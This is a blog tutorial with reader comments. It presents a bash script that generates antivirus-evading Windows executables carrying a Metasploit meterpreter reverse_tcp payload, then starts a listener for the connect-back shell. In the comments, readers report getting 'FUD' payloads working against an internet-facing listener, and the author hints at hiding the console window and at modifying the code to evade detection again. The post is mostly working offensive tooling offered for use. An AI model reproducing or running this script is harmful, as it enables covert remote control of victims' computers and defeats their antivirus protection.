There is not much to be said about this issue, as there are so many ways to accomplish this. I wanted to try and give it a shot and see how far I will get in creating something what others call FUD (Fully Undetectable). As you can see from below results the file still gets detected by Microsoft and Kaspersky AV but I’ve intentionally left out the important part from the shell script to make it fully undetectable. I was using some simple shellscript-fu and some really basic knowledge of C language. The resulting executable will be different every time you run this script.
Update 11.11.2011 – As expected Virustotal starts detecting this stuff ;), just change the source code a bit (hint hint) and you get a clean executable again … may the source be with you.
What we need is a decent Linux distro and a mingw32 and Metasploit of course. Im using a Debian based system in this example, so hopefully the shellscript below will work. As always please study it first to see what it does – don’t be a script kiddie. Please remember to save this into the Metasploit root folder and make it executable.
REVERSE_TCP Payload generator
#!/bin/bash
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " By Astr0baby 2011 "
echo " With some Randomic gravy and sauce to bypass Antivirus "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
#Lets check for MinGW32
if builtin type -p i686-w64-mingw32-gcc > /dev/null ; then
echo "Here is a network device list available on yor machine"
else echo "Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools"
echo "exiting....."; exit
fi
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ? \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
*) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4
i686-w64-mingw32-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo " starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' E
What happens here is this :
- We choose a network interface according to the /proc/net/dev $interface
- Next we need to select a port number for our meterpreter to listen on $port
- Random seed to add some junk to the resulting C code source file $seed
- Finally with how many cycles we encode our shellcode $enumber
- Next we create a raw shellcode with msfencode and our variables
- Do some sed, and format the raw shellcode into C stuff
- Add some bogus functions and random data array
- Compile the C source with mingw32 to get Win32 PE executable
- Rename the EXE to some random filename ex. 32423.exe
- Strip the binary from Debug info
Here are some screenshots from Antivirus scanner engines I’ve taken to see how well the resulting executable avoids individual AVs.
The most obvious step to create a fully undetectable Meterpreter payload Executable is left out from the script intentionally.
Pingback: Coresec.org – Information Security Blog » FUD Payload Generator for Backtrack
Pingback: FUD Payload Generator for Backtrack 5 « AfterShell.com – IT Security Blog
Pingback: So you have antivirus and you think you are protected.. pfft….. think again… « Daniel Weis's I.T Security Blog
Your hint with the bit I understood, but how to apply your hint. :-?
Hi Astr0baby,
Nice work. I’m thoroughly enjoying learning from your awesome tutorial.
I finally got a FUD meterpreter compiled and it connects back fine from my test machine (win 7 EN), but when I try to migrate the process dies and I lose the session. Also noticed that a DOS box pops up and has to be manually closed which isn’t very stealthy. Likely that I broke something messing around with your code. I used the i686-w64-mingw32-gcc compiler instead. Didn’t get any errors although meterpreter seems buggy now. I just tried compiling another one and it dies while receiving the stage from the listener I have set up on the internet. I imagine I’m breaking something with your script but I’m not sure what. I think it’s interesting that both FUD samples used the same exact script yet one seems more broken than the other.
Any ideas or hints?
Thanks,
Janus
Hi Janus,
if you want a stealthy execution of the payload you need to change the Generator C code a little.
In C++ there are functions to make the command line window invisible using various methods. For example you can use WinAPI ShowWindow( hwnd, SW_HIDE ); as one methods, but then you need to use proper headers in the generator code. I’ve omitted these function on purpose so it would not be abused in a malicious way. As for the broken executables, you can try and debug them to see what causes the crashes I honestly cannot say (maybe its mingw related)
Could you explain the $RANDOM variable please. Thanks
$RANDOM is an internal Bash function (not a constant) that returns a pseudorandom [1] integer in the range 0 – 32767. It should not be used to generate an encryption key.
is it possible to use this method to make Metasploit’s ms08_067_netapi FUD?
Hi,
Im afraid you would have to rewrite the ms08_067_netapi module to include a “custom exe” in the advanced options. This option is available in the psexec module for example (show advanced)
Hi astrobaby, i have tested the exe output of the script, work properly with windows 7 but in windows xp won’t run. i have modified your script to insert an external IP address, so nothing of vital for script…any idea???
It should run on WinXP.
i have tested with Virtual-Box (windows xp sp3).
i have changed also the meterpreter with shell, nothing won’t run…
Hi, i have found my problem…the exe output work only with 64-bit system, i tried with windows xp,windows 7 32-bit and won’t run…you have some ideas to change the script and make it work even with the 32-bit?
Hi, just make sure you use right compiler (for 32bit or 64bit binary executables) And I would suggest checking the compiler string in the script as there might be some problems. Good luck ;)